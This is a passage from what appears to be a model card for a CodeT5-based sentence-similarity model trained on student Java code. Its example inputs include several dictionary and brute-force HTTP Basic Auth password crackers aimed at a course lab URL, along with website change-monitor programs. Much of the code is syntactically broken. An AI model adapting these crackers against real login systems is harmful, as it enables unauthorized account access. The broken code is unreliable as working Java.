\ <username: e.g. > <dictionary: e.g. /usr/share/lib/dict/words>\");\n System.exit(1);\n\ \ }\n\n Dictionary dictionary1 = new Dictionary(args[0], args[2]);\n \ \ try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n\ \ System.out.println(\"Cracking started at: \" + cal1.getTime().toString());\n\ \ String password = dictionary1.crackPassword(args[1]);\n if(password\ \ != null)\n System.out.println(\"\\nPassword is: \"+password);\n \ \ else\n System.out.println(\"\\nPassword could not retrieved!\");\n \ \ cal2 = Calendar.getInstance();\n System.out.println(\"Cracking finished\ \ at: \" + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime()\ \ - cal1.getTime().getTime());\n System.out.println(\"Total Time taken crack:\ \ \" + (d3.getTime())/1000 + \" sec\");\n System.out.println(\"Total attempts\ \ : \" + dictionary1.getAttempts());\n\n }catch(MalformedURLException mue){\n\ \ mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n\ \ }\n }\n}" - "import java.io.*;\nimport java.net.*;\nimport java.security.*;\nimport java.math.*;\n\ import java.*;\nimport java.util.*;\n\n\npublic class BruteForce\n{\n public\ \ static void main (String args[]) throws Exception {\n\tString retVal = null,\ \ StatusCode = \"HTTP/1.1 200 OK\";\n int found = 0, count = 0, ctrl = 0, flag\ \ = 0;\n\n\n stime = System.currentTimeMillis();\n char[] c =\ \ new char[3];\n System.out.println(\"Cracking password by Brute Force...\"\ );\n\n\t for(int i=65; ((i<123) && (found == 0)); i++)\n\t {\n\t \ \ for(int j=65; ((j<123) && (found == 0)); j++)\n\t {\n\t for (int\ \ k=65; ((k<123) && (found == 0)); k++)\n\t {\n try {\n\ \ if (ctrl == 0) {\n c[0] = '\\0';\n \ \ c[1] = '\\0';\n } else if ((ctrl == 1)\ \ && (flag == 0)) {\n c[0] = '\\0';\n }\n\ \ c[2] = (char)(k);\n\n\t \n \ \ URL yahoo = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \ \ URLConnection yc = yahoo.openConnection();\n\n \ \ \n String authString = \":\" + String.valueOf();\n \ \ String auth = new bf.misc.BASE64Encoder().encode(authString.getBytes());\n\ \ yc.setRequestProperty(\"Authorization\", \" \" + auth);\n\ \ count++;\n\n \n BufferedReader\ \ in = new BufferedReader(\n new InputStreamReader(\n\ \ yc.getInputStream()));\n\n \ \ String inputLine;\n while ((inputLine = in.readLine())\ \ != null){\n System.out.println(inputLine);\n \ \ etime = System.currentTimeMillis();\n \ \ System.out.println(\"Password found -- \" + String.valueOf());\n \ \ System.out.println(\"Time used = \" + ((etime - stime)/1000)\ \ + \" sec\");\n System.out.println(\"# of attempt =\ \ \" + count);\n System.out.println(\"End of cracking!\"\ );\n found = 1;\n }\n \ \ in.print();\n\n\t } catch (Exception ex) {}\n\t }\n\t\ \ ctrl = 1;\n c[1] = (char)(j);\n }\n \ \ ctrl = 2;\n flag = 1;\n c[0] = (char)(i);\n }\n\ \ if (found == 0){\n System.out.println(\"Sorry, password found.\"\ );\n System.out.println(\"# of attempt = \" + count);\n System.out.println(\"\ End of cracking!\");\n }\n }\n}" - "\n\nimport java.net.*;\nimport java.io.*;\n\nimport java.*;\nimport java.util.*;\n\ \npublic class Dictionary {\n\n private static String commandLine = \"curl http://sec-crack.cs.rmit.edu./SEC/2/index.php\ \ -I -u :\";\n private String password; \n private String previous;\ \ \n private String url; \n private int startTime;\n\ \ private int endTime;\n private int totalTime;\n private float averageTime;\n\ \ private boolean finish;\n private Process curl;\n private BufferedReader\ \ bf, responseLine;\n\n public Dictionary() {\n\n first();\n finish = true;\ \ \n previous = \"\"; \n\ \ Runtime run = Runtime.getRuntime();\n startTime =new Date().getTime(); \ \ \n int i=0;\n try {\n try {\n bf = new BufferedReader(new FileReader(\"\ words\"));\n }\n catch(FileNotFoundException notFound) {\n bf = new BufferedReader(new\ \ FileReader(\"/usr/share/lib/dict/words\"));\n }\n\n while((password = bf.readLine())\ \ != null) {\n if(password.length()>3) password = password.substring(0,3);\n\ \ if(previous.equals(password)) ;\n else {\n previous = password;\n \ \ url = commandLine+password;\n curl= run.exec(url); \n\ \ responseLine=new BufferedReader(new InputStreamReader(curl.getInputStream()));\n\ \ \n if(responseLine.readLine().substring(9,12).equals(\"200\")) break;\n\ \ }\n }\n }\n catch(IOException ioe) {\n System.out.println(\"\\n IO\ \ Exception! \\n\");\n System.out.println(\"The current url is:\"+ url);\n\ \ System.out.println(\"The current trying password is:\"+password);\n finish=false;\n\ \ }\n\n endTime = new Date().getTime(); \n totalTime = (endTime-startTime)/1000;\n\ \ System.out.println(\" The response time is:\"+ totalTime + \" seconds\\\ n\");\n if(finish) {\n System.out.println(\" The password for is:\"+ password);\n\ \ try {\n savePassword(password, totalTime);\n }\n catch (IOException\ \ ioec) {\n System.out.println(\" not save the password file Dictionary_pwd.txt\ \ \");\n }\n }\n }\n\n\n public void savePassword(String passwdString, int\ \ time) throws IOException {\n DataOutputStream outputStream = new DataOutputStream(new\ \ FileOutputStream(\"Dictionary_pwd.txt\"));\n outputStream.writeChars(\"The\ \ password is:\");\n outputStream.writeChars(passwdString+\"\\n\");\n outputStream.writeChars(\"\ The response time is: \");\n outputStream.writeChars(sw.toString(time));\n outputStream.writeChars(\"\ \ seconds\\n\");\n outputStream.close();\n }\n\n public void first() {\n\n\ \ System.out.println(\"\\n\\n----------------------------------------------\"\ );\n System.out.println(\" Use curl command and dictionary \");\n System.out.println(\"\ \ Brute Force the password for user \");\n System.out.println(\"----------------------------------------------\"\ );\n }\n\n public static void main(String[] args) {\n new Dictionary();\n\ \ } \n}\n" - source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\nimport java.io.BufferedReader;\n\ import java.io.InputStream;\nimport java.io.InputStreamReader;\nimport java.io.IOException;\n\ import java.io.FileInputStream;\nimport java.io.FileNotFoundException;\nimport\ \ java.util.*;\nimport java.*;\n\n\npublic class Dictionary {\n public static\ \ void main(String[] args) throws Exception {\n String pass;\n int\ \ attempt = 0;\n String fileName = \"words.txt\", line;\n BufferedReader\ \ reader;\n Dictionary dict = new Dictionary();\n boolean flag=false;\n\ \n System.out.println(System.currentTimeMillis()/1000);\n\n try{\n\ \ reader = new BufferedReader(new InputStreamReader(new FileInputStream(fileName)));\n\ \ while (!flag)\n {\n try{\n line = reader.readLine();\n\ \ attempt++;\n URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\"\ );\n URLConnection yc = url.openConnection();\n pass\ \ = \":\" + line;\n String password = new url.misc.BASE64Encoder().encode(pass.getBytes());\n\ \ yc.setRequestProperty(\"Authorization\",\" \"+password);\n \ \ BufferedReader in = new BufferedReader(new InputStreamReader(yc.getInputStream()));\n\ \ String inputLine;\n while ((inputLine = in.readLine())\ \ != null)\n System.out.println(inputLine);\n \ \ in.close();\n System.out.println(pass);\n flag=true;\n\ \ System.out.println(System.currentTimeMillis()/1000); \n \ \ System.out.println(\" of attempt: \"+attempt);\n System.exit(0);\n\ \ }catch(IOException e){\n \n }\n \ \ } \n }catch(FileNotFoundException e){\n System.out.println(\"\ File not found\");\n\n }\n }\n}" sentences: - "import java.io.*;\nimport java.net.*;\nimport java.util.*;\n\npublic class Watchdog\n\ {\n\tpublic static void main(String args[])\n\t{\n\t\t\n\t\tString mainLink=\"\ http://www.cs.rmit.edu./students/\";\n\t\tString sender = \"@cs.rmit.edu.\";\n\ \t\tString recipient = \"<webtech@acuneeds.>\";\n\t\tString hostName = \"yallara.cs.rmit.edu.\"\ ;\n\t\tint delay = 86400000;\n\n\t\ttry\n\t\t{\n\t\t\tint imgSrcIndex, imgSrcEnd;\n\ \t\t\tString imgLink;\n\t\t\tVector imageList = new Vector();\n\t\t\tHttpURLConnection\ \ imgConnection;\n\t\t\tURL imgURL;\n\n\t\t\t\n\t\t\tEmailClient email = new EmailClient(sender,\ \ recipient, hostName);\n\n\t\t\t\n\t\t\tURL url=new URL(mainLink);\n\t\t\tHttpURLConnection\ \ connection = (HttpURLConnection) url.openConnection();\n\n\t\t\tBufferedReader\ \ webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));\n\ \n\t\t\t\n\t\t\tFileWriter fwrite = new FileWriter(\"local.txt\");\n\t\t\tBufferedWriter\ \ writefile = new BufferedWriter(fwrite);\n\n\t\t\tString line=webpage.readLine();\n\ \n\t\t\twhile (line != null)\n\t\t\t{\n\t\t\t\t\n\t\t\t\twritefile.write(line,0,line.length());\n\ \t\t\t\twritefile.newLine();\n\n\t\t\t\t\n\t\t\t\tline = line.toLowerCase();\n\ \t\t\t\timgSrcIndex=line.indexOf(\"src\");\n\n\t\t\t\tif(imgSrcIndex!=-1)\n\t\t\ \t\t{\n\t\t\t\t\t\n\t\t\t\t\timgLink = line.substring(imgSrcIndex+3);\n\t\t\t\t\ \timgSrcIndex=imgLink.indexOf(\"\\\"\");\n\t\t\t\t\timgLink = imgLink.substring(imgSrcIndex+1);\n\ \t\t\t\t\timgSrcEnd = imgLink.indexOf(\"\\\"\");\n\t\t\t\t\timgLink = imgLink.substring(0,imgSrcEnd);\n\ \n\t\t\t\t\t\n\t\t\t\t\tif (imgLink.startsWith(\"http\"))\n\t\t\t\t\t{\n\t\t\t\ \t\t\timgURL = new URL(imgLink);\n\t\t\t\t\t\timgConnection = (HttpURLConnection)\ \ imgURL.openConnection();\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\ {\n\t\t\t\t\t\timgURL = new URL(mainLink);\n\t\t\t\t\t\timgURL = new URL(imgURL,\ \ imgLink);\n\t\t\t\t\t\timgConnection = (HttpURLConnection) imgURL.openConnection();\n\ \t\t\t\t\t\timgLink = (imgConnection.getURL()).toString();\n\t\t\t\t\t}\n\n\t\t\ \t\t\t\n\t\t\t\t\timageList.add(new ImageFile(imgLink, imgConnection.getContentLength()));\n\ \t\t\t\t\timgConnection.disconnect();\n\t\t\t\t}\n\n\t\t\t\tline = webpage.readLine();\n\ \n\t\t\t}\n\n\t\t\t\n\t\t\twritefile.close();\n\t\t\tfwrite.close();\n\t\t\twebpage.close();\n\ \t\t\tconnection.disconnect();\n\n\t\t\t\n\t\t\tWatchdogThread watchdog = new\ \ WatchdogThread(mainLink, imageList, email, delay);\n\t\t}\n\n\t\tcatch (IOException\ \ ioe)\n\t\t{\n\t\t\t\n\t\t\t\n\t\t\tSystem.out.println(ioe);\n\t\t\tSystem.out.println(\"\ Please run program again.\");\n\t\t\tSystem.exit(0);\n\t\t}\n\n\t}\n\n}\n" - "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\ \ String strUserName;\n private String strURL;\n private String strDictPath;\n\ \ private int iAttempts;\n\n \n public Dictionary(String strURL,String\ \ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\ \ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\ \ }\n \n\n public String getPassword(){\n URL u;\n String result\ \ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\ \ uc;\n String strPassword = new String();\n String strEncode;\n \ \ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\ \ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\ \ uc = u.openConnection();\n uc.setDoInput(true);\n \ \ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\ \ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\ \ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \ \ \n result = uc.getHeaderField(0);\n uc = null;\n \ \ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\ \ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\ \ return(strPassword);\n }\n \n public int getAttempts(){\n return\ \ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\ \ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\ \ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\ \ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\ Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\ \ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\ );\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\ \ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\ \ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\ \ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\ \ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\ \ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \ \ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\ \ String getNewPassword()\n throws PasswordFailureException{\n try {\n \ \ {\n line = inputFile.readLine();\n }while (line.length() !=\ \ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\ \ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\ \ RuntimeException {\n\n public PasswordFailureException() {\n }\n}" - "\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class\ \ Dictionary{\n\n private static URL location;\n private static String user;\n\ \ private BufferedReader input;\n private static BufferedReader dictionary;\n\ \ private int maxLetters = 3;\n\n \n\n public Dictionary() {\n \n \ \ Authenticator.setDefault(new MyAuthenticator ());\n\n startTime = System.currentTimeMillis();\n\ \ boolean passwordMatched = false;\n while (!passwordMatched) {\n \ \ try {\n input = new BufferedReader(new InputStreamReader(location.openStream()));\n\ \ String line = input.readLine();\n while (line != null) {\n\ \ System.out.println(line);\n line = input.readLine();\n\ \ }\n input.close();\n passwordMatched = true;\n \ \ }\n catch (ProtocolException e)\n {\n \n \ \ \n }\n catch (ConnectException e) {\n System.out.println(\"\ Failed connect\");\n }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n endTime = System.currentTimeMillis();\n\ \ System.out.println(\"Total Time: \"+cad.concat(Math.toString(endTime -\ \ startTime)));\n }\n\n \n\n private char[] nextPassword() {\n String\ \ password = new String();\n try {\n password = dictionary.readLine();\n\ \ while (password.length() > maxLetters) {\n password = dictionary.readLine();\n\ \ }\n }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n\n return password.toCharArray();\n \ \ }\n\n\n \n\n public static void main(String args[]) {\n if (args.length\ \ != 3) {\n System.out.println(\"Usage: java Dictionary url user dictionary\"\ );\n System.exit(-1);\n }\n try {\n location = new URL(args[0]);\n\ \ }\n catch (MalformedURLException e) {\n e.printStackTrace();\n\ \ }\n user = new String().concat(args[1]);\n try {\n dictionary\ \ = new BufferedReader(new FileReader(args[2]));\n }\n catch (IOException\ \ e) {\n e.printStackTrace();\n System.exit(-1);\n }\n \ \ new Dictionary();\n }\n\n \n\n class MyAuthenticator extends Authenticator\ \ {\n protected PasswordAuthentication getPasswordAuthentication() {\n \ \ char [] currentPassword = nextPassword();\n System.out.print(user.concat(\"\ -\"));\n System.out.println(currentPassword);\n return new PasswordAuthentication\ \ (user, currentPassword);\n }\n }\n}\n" - source_sentence: "\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic\ \ class Dictionary\n{\n public static void main (String args[]) throws IOException,\n\ \ MalformedURLException\n {\n final String username = \"\";\n final\ \ String fullurl = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n final String\ \ dictfile = \"/usr/share/lib/dict/words\";\n String temppass;\n String\ \ password = \"\";\n URL url = new URL(fullurl);\n boolean cracked =\ \ false;\n\n startTime = System.currentTimeMillis();\n\n \n BufferedReader\ \ r = new BufferedReader(new FileReader(dictfile));\n\n while((temppass =\ \ r.readLine()) != null && !cracked)\n { \n \n if(temppass.length()\ \ <= 3)\n {\n \n if(isAlpha(temppass))\n \ \ {\n \n Authenticator.setDefault(new MyAuthenticator(username,temppass));\n\ \ try{\n BufferedReader x = new BufferedReader(new\ \ InputStreamReader(\n url.openStream()));\n \ \ cracked = true;\n password = temppass;\n \ \ } catch(Exception e){}\n }\n }\n }\n\n stopTime\ \ = System.currentTimeMillis();\n \n if(!cracked)\n System.out.println(\"\ Sorry, couldnt find the password\");\n else\n System.out.println(\"\ Password found: \"+password);\n System.out.println(\"Time taken: \"+(stopTime-startTime));\n\ \ }\n\n public static boolean isAlpha(String s)\n {\n boolean v = true;\n\ \ for(int i=0; i<s.length(); i++)\n {\n if(!Character.isLetter(s.charAt(i)))\n\ \ v = false;\n }\n return ;\n }\n}\n\n" sentences: - "\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport\ \ java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer\ \ stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n\ \ int i,j = 0;\n\n try{\n\n URL yahoo = new URL(\"http://www.cs.rmit.edu./students/\"\ ); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n String inputLine = \"\";\n String inputLine1 = \"\";\n String\ \ changedtext= \"\";\n String changedflag= \"\";\n\n\n Thread.sleep(180);\n\ \n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n\n while ((inputLine = in.readLine()) != null) {\n inputLine1\ \ = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n \ \ System.out.println(\"equal\");\n }\n else {\n \ \ System.out.println(\"Detected a Change\");\n System.out.println(\"\ Line Before the change:\" + inputLine);\n System.out.println(\"Line\ \ After the change:\" + inputLine1);\n changedtext = changedtext\ \ + inputLine + inputLine1;\n changedflag = \"Y\";\n }\n\ \ \n }\n\n if (in1.readLine() != null ) {\n System.out.println(\"\ Detected a Change\");\n System.out.println(\"New Lines Added \");\n \ \ changedtext = changedtext + \"New Lines added\";\n changedflag\ \ = \"Y\";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals(\"\ Y\")) {\n String smtphost =\"smtp.mail.rmit.edu.\" ; \n String\ \ from = \"@rmit.edu.\"; \n String = \"janaka1@optusnet..\" ; \n \ \ }\n\n\n }\n catch(Exception e){ System.out.println(\"exception:\" + e);}\n\ \t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\ \t\tWatchDog u = new WatchDog();\n }\n}\n" - "\n\n\n\nimport java.util.*;\nimport java.net.*;\nimport java.io.*;\nimport javax.swing.*;\n\ \npublic class PasswordCombination\n{\n private int pwdCounter = 0;\n\ \ private int startTime;\n private String str1,str2,str3;\n private\ \ String url = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n private String\ \ loginPwd;\n private String[] password;\n private HoldSharedData data;\n\ \ private char[] chars = {'A','B','C','D','E','F','G','H','I','J','K','L','M',\n\ \ 'N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\n\ \ 'a','b','c','d','e','f','g','h','i','j','k','l','m',\n\ \ 'n','o','p','q','r','s','t','u','v','w','x','y','z'};\n\ \n public PasswordCombination()\n {\n System.out.println(\"Programmed\ \ by for INTE1070 Assignment 2\");\n\n String input = JOptionPane.showInputDialog(\ \ \"Enter number of threads\" );\n if( input == null )\n System.exit(0);\n\ \n int numOfConnections = Integer.parseInt( input );\n startTime\ \ = System.currentTimeMillis();\n int pwdCounter = 52*52*52 + 52*52 + 52;\n\ \ password = new String[pwdCounter];\n\n\n loadPasswords();\n \ \ System.out.println( \"Total Number of Passwords: \" + pwdCounter );\n \ \ createConnectionThread( numOfConnections );\n }\n\n private void\ \ doPwdCombination()\n {\n for( int i = 0; i < 52; i ++ )\n {\n\ \ str1 = \"\" + chars[i];\n password[pwdCounter++] = \"\"\ \ + chars[i];\n System.err.print( str1 + \" | \" );\n\n \ \ for( int j = 0; j < 52; j ++ )\n {\n str2 = str1 +\ \ chars[j];\n password[pwdCounter++] = str1 + chars[j];\n\n \ \ for( int k = 0; k < 52; k ++ )\n {\n \ \ str3 = str2 + chars[k];\n password[pwdCounter++] =\ \ str2 + chars[k];\n }\n }\n }\n }\n\n \ \ private void loadPasswords( )\n {\n FileReader fRead;\n \ \ BufferedReader buf;\n String line = null;\n String \ \ fileName = \"words\";\n\n try\n {\n fRead = new\ \ FileReader( fileName );\n buf = new BufferedReader(fRead);\n\n \ \ while((line = buf.readLine( )) != null)\n {\n \ \ password[pwdCounter++] = line;\n }\n }\n catch(FileNotFoundException\ \ e)\n {\n System.err.println(\"File not found: \" + fileName);\n\ \ }\n catch(IOException ioe)\n {\n System.err.println(\"\ IO Error \" + ioe);\n }\n }\n\n private void createConnectionThread(\ \ int input )\n {\n data = new HoldSharedData( startTime, password,\ \ pwdCounter );\n\n int numOfThreads = input;\n int batch = pwdCounter/numOfThreads\ \ + 1;\n numOfThreads = pwdCounter/batch + 1;\n System.out.println(\"\ Number of Connection Threads Used=\" + numOfThreads);\n ConnectionThread[]\ \ connThread = new ConnectionThread[numOfThreads];\n\n for( int index =\ \ 0; index < numOfThreads; index ++ )\n {\n connThread[index]\ \ = new ConnectionThread( url, index, batch, data );\n connThread[index].conn();\n\ \ }\n }\n} " - "import java.io.*;\nimport java.util.StringTokenizer;\nimport java.net.smtp.SmtpClient;\n\ import java.util.Timer;\nimport java.util.TimerTask;\n\n\npublic class WatchDog\ \ {\npublic static void main(String[] args) {\ntry {\nProcess y = Runtime.getRuntime().exec(\"\ ./init\");\n}\ncatch (Exception e) {System.err.println(e);}\n\n\nWatchDog poodle=new\ \ WatchDog();\n {\npoodle.startWatch();\n} while(1==1);\n}\n\npublic void startWatch()\ \ {\nString error_mes=new String();\nString mesg=new String();\nString url=\"\ wget -p http://www.cs.rmit.edu./students\";\n\ntry {\nProcess a = Runtime.getRuntime().exec(url);\n\ }\ncatch (Exception e) {System.err.println(e);}\n\ntry {\nProcess b = Runtime.getRuntime().exec(\"\ diff org/images/ www.cs.rmit.edu./images/\");\n BufferedReader stdInputimages\ \ = new BufferedReader(new InputStreamReader(b.getInputStream()));\n \ \ while ((error_mes = stdInputimages.readLine()) != null) {\n\n \ \ mesg=mesg.concat(error_mes);\n \n \n \ \ }\n}\ncatch (Exception e) {System.err.println(e);}\n\n\n\n\ntry {\nProcess\ \ c = Runtime.getRuntime().exec(\"diff org/students/ www.cs.rmit.edu./students/\"\ );\nBufferedReader stdInputindex = new BufferedReader(new InputStreamReader(c.getInputStream()));\n\ \ while ((error_mes = stdInputindex.readLine()) != null) {\n \ \ mesg=mesg.concat(error_mes);\n \n }\n}\n\ catch (Exception e) {System.err.println(e);}\n\n\nif (mesg.length()>0) { sendEmail(mesg);\ \ }\n\ntry { Thread.sleep(60*60*24*1000);\n } catch(Exception e) { }\n}\n\n\n\n\ \n\npublic void sendEmail(String message) {\n{\nString reciever = \"@cs.rmit.edu.\"\ ;\nString sender = \"[email protected].\";\n\n try {\n\n \ \ SmtpClient smtp = new SmtpClient();\n smtp.from(sender);\n\ \ smtp.to(reciever);\n PrintStream\ \ msg = smtp.startMessage();\n msg.println(message);\n\ \ smtp.closeServer();\n }\n\n \ \ catch (Exception e) {}\n\n }\n}\n}" pipeline_tag: sentence-similarity library_name: sentence-transformers --- # SentenceTransformer based on Salesforce/codet5-small This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [Salesforce/codet5-small](https://huggingface.co/Salesforce/codet5-small). It maps sentences & paragraphs to a 512-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more. ## Model Details ### Model Description - **Model Type:** Sentence Transformer - **Base model:** [Salesforce/codet5-small](https://huggingface.co/Salesforce/codet5-small) <!-- at revision b1ee9570c289f21b5922b9c768a1ce12957bf968 --> - **Maximum Sequence Length:** 512 tokens - **Output Dimensionality:** 512 dimensions - **Similarity Function:** Cosine Similarity <!-- - **Training Dataset:** Unknown --> <!-- - **Language:** Unknown --> <!-- - **License:** Unknown --> ### Model Sources - **Documentation:** [Sentence Transformers Documentation](https://sbert.net) - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers) - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers) ### Full Model Architecture ``` SentenceTransformer( (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: T5EncoderModel (1): Pooling({'word_embedding_dimension': 512, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True}) ) ``` ## Usage ### Direct Usage (Sentence Transformers) First install the Sentence Transformers library: ```bash pip install -U sentence-transformers ``` Then you can load this model and run inference. ```python from sentence_transformers import SentenceTransformer # Download from the 🤗 Hub model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST") # Run inference sentences = [ '\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic class Dictionary\n{\n public static void main (String args[]) throws IOException,\n MalformedURLException\n {\n final String username = "";\n final String fullurl = "http://sec-crack.cs.rmit.edu./SEC/2/";\n final String dictfile = "/usr/share/lib/dict/words";\n String temppass;\n String password = "";\n URL url = new URL(fullurl);\n boolean cracked = false;\n\n startTime = System.currentTimeMillis();\n\n \n BufferedReader r = new BufferedReader(new FileReader(dictfile));\n\n while((temppass = r.readLine()) != null && !cracked)\n { \n \n if(temppass.length() <= 3)\n {\n \n if(isAlpha(temppass))\n {\n \n Authenticator.setDefault(new MyAuthenticator(username,temppass));\n try{\n BufferedReader x = new BufferedReader(new InputStreamReader(\n url.openStream()));\n cracked = true;\n password = temppass;\n } catch(Exception e){}\n }\n }\n }\n\n stopTime = System.currentTimeMillis();\n \n if(!cracked)\n System.out.println("Sorry, couldnt find the password");\n else\n System.out.println("Password found: "+password);\n System.out.println("Time taken: "+(stopTime-startTime));\n }\n\n public static boolean isAlpha(String s)\n {\n boolean v = true;\n for(int i=0; i<s.length(); i++)\n {\n if(!Character.isLetter(s.charAt(i)))\n v = false;\n }\n return ;\n }\n}\n\n', '\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n int i,j = 0;\n\n try{\n\n URL yahoo = new URL("http://www.cs.rmit.edu./students/"); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n String inputLine = "";\n String inputLine1 = "";\n String changedtext= "";\n String changedflag= "";\n\n\n Thread.sleep(180);\n\n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n\n while ((inputLine = in.readLine()) != null) {\n inputLine1 = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n System.out.println("equal");\n }\n else {\n System.out.println("Detected a Change");\n System.out.println("Line Before the change:" + inputLine);\n System.out.println("Line After the change:" + inputLine1);\n changedtext = changedtext + inputLine + inputLine1;\n changedflag = "Y";\n }\n \n }\n\n if (in1.readLine() != null ) {\n System.out.println("Detected a Change");\n System.out.println("New Lines Added ");\n changedtext = changedtext + "New Lines added";\n changedflag = "Y";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals("Y")) {\n String smtphost ="smtp.mail.rmit.edu." ; \n String from = "@rmit.edu."; \n String = "janaka1@optusnet.." ; \n }\n\n\n }\n catch(Exception e){ System.out.println("exception:" + e);}\n\t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\t\tWatchDog u = new WatchDog();\n }\n}\n', '\n\n\n\nimport java.util.*;\nimport java.net.*;\nimport java.io.*;\nimport javax.swing.*;\n\npublic class PasswordCombination\n{\n private int pwdCounter = 0;\n private int startTime;\n private String str1,str2,str3;\n private String url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n private String loginPwd;\n private String[] password;\n private HoldSharedData data;\n private char[] chars = {\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'I\',\'J\',\'K\',\'L\',\'M\',\n \'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\',\n \'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\n \'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\'};\n\n public PasswordCombination()\n {\n System.out.println("Programmed by for INTE1070 Assignment 2");\n\n String input = JOptionPane.showInputDialog( "Enter number of threads" );\n if( input == null )\n System.exit(0);\n\n int numOfConnections = Integer.parseInt( input );\n startTime = System.currentTimeMillis();\n int pwdCounter = 52*52*52 + 52*52 + 52;\n password = new String[pwdCounter];\n\n\n loadPasswords();\n System.out.println( "Total Number of Passwords: " + pwdCounter );\n createConnectionThread( numOfConnections );\n }\n\n private void doPwdCombination()\n {\n for( int i = 0; i < 52; i ++ )\n {\n str1 = "" + chars[i];\n password[pwdCounter++] = "" + chars[i];\n System.err.print( str1 + " | " );\n\n for( int j = 0; j < 52; j ++ )\n {\n str2 = str1 + chars[j];\n password[pwdCounter++] = str1 + chars[j];\n\n for( int k = 0; k < 52; k ++ )\n {\n str3 = str2 + chars[k];\n password[pwdCounter++] = str2 + chars[k];\n }\n }\n }\n }\n\n private void loadPasswords( )\n {\n FileReader fRead;\n BufferedReader buf;\n String line = null;\n String fileName = "words";\n\n try\n {\n fRead = new FileReader( fileName );\n buf = new BufferedReader(fRead);\n\n while((line = buf.readLine( )) != null)\n {\n password[pwdCounter++] = line;\n }\n }\n catch(FileNotFoundException e)\n {\n System.err.println("File not found: " + fileName);\n }\n catch(IOException ioe)\n {\n 